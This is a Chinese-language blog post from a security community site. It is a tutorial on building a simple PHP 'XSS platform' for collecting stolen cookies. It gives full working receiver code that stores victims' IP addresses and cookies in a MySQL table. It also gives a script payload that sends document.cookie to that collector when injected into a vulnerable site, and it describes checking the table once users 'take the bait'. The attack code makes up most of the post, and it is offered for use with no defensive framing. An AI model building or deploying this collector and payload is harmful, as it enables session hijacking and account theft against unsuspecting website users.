• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    1个月前 (12-11)  网站搭建 |   5 条评论

    网上很多xss平台配置起来都很麻烦压根搞不明白 比如我 就不会写.htaccess规则 一直没有搭建成功。

    看下效果吧:

    简单搭建php版xss平台

    找不到存在漏洞站 我就拿的webshell测试的。

    准备工具:支持php的服务器或空间  mysql
    

    先链接到mysql 创建mydata库 cookie表 (结构cookies字段)建议都按我的创建 不然改起下面的源码麻烦点
    xss平台收信源码:

    <?php
    $sb = 'ip:'. $_SERVER['REMOTE_ADDR']. 'cookie:' .$_GET['cookie'];//很关键 乱删后果自负
    $app = array(
            'db_host' => '127.0.0.1',//地址
            'db_user' => 'porry',//用户名
            'db_pass' => 'hbporry',//密码
            'db_name' => 'mydata',//库名
            'db_port' => 3306, 
            'db_prefix' => '',
    );
    
    function db() {
            global $app;
            static $db;
            if ($db) {
                    return $db;
            } else {
                    $db = @new mysqli(
                            $app['db_host'], 
                            $app['db_user'], 
                            $app['db_pass'], 
                            $app['db_name'], 
                            $app['db_port']
                    );
                    if ($db->connect_errno) {
                            echo $db->connect_error;
                            exit();
                    }
                    $db->set_charset('utf8');//编码 新世纪安全提示最好用国际编码utf-8
                    return $db;
            }
    }
    
    function insert($cookies) {
            global $app;
            $db = db();
            $table = $app['db_prefix'].'cookie';
            $sql = "INSERT INTO $table (cookies) VALUES (?)";
            $stmt = $db->prepare($sql);
            $stmt->bind_param('s', $cookies);
            $stmt->execute();
            //插入失败,或者没有AUTO_INCREMENT字段,或者不是INSERT语句,insert_id为0.
            return ($stmt->affected_rows == 0) ? false : $stmt->insert_id;
    }
    
    var_export(insert($sb));
    
    

    将上面的内容保存成webxss.php 上传到空间或服务器即可。
    将下面代码放置在可能存在XSS漏洞的地方利用:

    <script>window.open("http://127.0.0.1/webxss.php?cookie="+document.cookie);</script>
    

    当有用户上钩后 进入数据库查看cookie表就行了 觉得麻烦也可以自己写一个输出字段的页面。

     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/1410.html

    八块腹肌挂腰间,续写另类拳皇篇。

    发表评论

    1. 刷刷刷刷

      porry001 1个月前 (12-12) [0] [0]
    2. 非常值得学习

      sysgod 1个月前 (12-12) [0] [0]
    3. 值得学习,学习了

      神州 1个月前 (12-12) [0] [0]
    4. 不错,值得学习!

      tianshao 1个月前 (12-11) [0] [0]
    5. 不错可以,学习

      sysgod 1个月前 (12-11) [0] [0]
    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享